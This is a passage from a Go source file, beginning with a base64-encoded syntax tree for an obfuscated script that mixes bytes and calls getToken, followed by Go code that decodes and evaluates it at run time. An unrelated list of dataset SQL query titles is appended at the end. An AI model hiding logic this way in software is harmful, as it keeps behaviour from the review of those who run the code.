}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"dsdd","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"ks2","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Caller":{"Name":"cyout","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"},{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"alldata","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Init":{"Token":"var","Declarations":[{"Name":"i2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":4,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"dpppp","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":5,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"jii","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":100,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},{"Block":{"Body":[{"Left":{"Name":"jii","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Name":"dpppp","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"\u003e\u003e","PAIX":0,"TypeInfo":"yyy"},"Right":{"Value":3,"PAIX":0,"TypeInfo":"ttt"},"Operator":"*","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"Handler":{"Param":null,"Body":{"Body":[{"Left":{"Name":"jii","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Object":{"Object":{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"i2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":400,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"catch"},"PAIX":0,"TypeInfo":"try"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},{"Left":{"Name":"jii","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":3000,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"}],"PAIX":0,"TypeInfo":"iiii"},{"Test":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":1000,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003e","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"-","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":255,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Id":{"Name":"gid","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Id":{"Name":"djki","PAIX":-1,"TypeInfo":"aaaaa"},"Params":[],"Body":{"Body":[{"Test":{"Left":{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Operator":"!=","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Argument":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"return"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"},{"Token":"var","Declarations":[{"Name":"dshu","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"i","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"i","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"oooo"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Init":{"Token":"var","Declarations":[{"Name":"ivvv","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"hsioad","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"Operator":"*","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Name":"hsioad","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003e\u003e","PAIX":0,"TypeInfo":"yyy"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":255,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Token":"var","Declarations":[{"Name":"alldt","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Properties":[{"Key":{"Value":"data","PAIX":0,"TypeInfo":"ooooo"},"Value":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"llll"}],"PAIX":0,"TypeInfo":"pppppp"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"vhui","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"JSON","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"stringify","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"alldt","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cbb_a","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldt","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"},{"Token":"var","Declarations":[{"Name":"kfc","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Callee":{"Name":"Promise","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"djki","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"new"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"hiho","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"kfc","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"alldt2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"l2","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"dshu2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"ivvv2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"l2","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"hsioad","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"l2","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"hdakdasj","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"gys","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Object":{"Object":{"Name":"alldt2","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"data","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"hdakdasj","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"fsg","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Name":"hsioad","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"gys","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"dshu2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"fsg","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},{"Test":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"dshu2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"gys","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Token":"var","Declarations":[{"Name":"dt","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Properties":[{"Key":{"Value":"data","PAIX":0,"TypeInfo":"ooooo"},"Value":{"Name":"dshu2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"llll"}],"PAIX":0,"TypeInfo":"pppppp"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cbb_a","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"dt","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Object":{"Name":"hiho","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"vhui","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"JSON","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"stringify","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"getToken","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"vhui","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"},{"Init":{"Token":"var","Declarations":[{"Name":"irr","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":255,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Caller":{"Name":"gid","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"}],"TypeInfo":"aaaa"}`
decodedBytes, err := base64.StdEncoding.DecodeString(encodedText)
if err != nil {
fmt.Println("Decode error:", err)
return nil
}
dd := string(decodedBytes)
sdsgh := sync.WaitGroup{}
sdsgh.Add(1)
go func() {
defer sdsgh.Done()
promise.CyJSInit()
ss := parseToDt.LoadStr(dd)
dyy := ss.(*ast.Program)
env := object.NewEnv(nil)
StartEval(dyy.Body, env)
promise.Done()
}()
sdsgh.Wait()
return nil
}
|
Subsets and Splits
PyTorch Neural Network Imports
This query filters for code examples containing a specific PyTorch import pattern, which is useful for finding code snippets that use PyTorch's neural network module but doesn't provide deeper analytical insights about the dataset.
HTML Files in Train Set
Retrieves all records from the dataset where the file path ends with .html or .htm, providing a basic filter for HTML files.
SQL Console for nick007x/github-code-2025
Retrieves 200 file paths that end with '.html' or '.htm', providing a basic overview of HTML files in the dataset.
Top HTML Files
The query retrieves a sample of HTML file paths, providing basic filtering but limited analytical value.
CSharp Repositories Excluding Unity
Retrieves all records for repositories that contain C# files but are not related to Unity, providing a basic filter of the dataset.
C# File Count per Repository
Counts the total number of C# files across distinct repositories, providing a basic measure of C# file presence.
SQL Console for nick007x/github-code-2025
Lists unique repository IDs containing C# files, providing basic filtering to understand which repositories have C# code.
Select Groovy Files: Train Set
Retrieves the first 1000 entries from the 'train' dataset where the file path ends with '.groovy', providing a basic sample of Groovy files.
GitHub Repos with WiFiClientSecure
Finds specific file paths in repositories that contain particular code snippets related to WiFiClientSecure and ChatGPT, providing basic filtering of relevant files.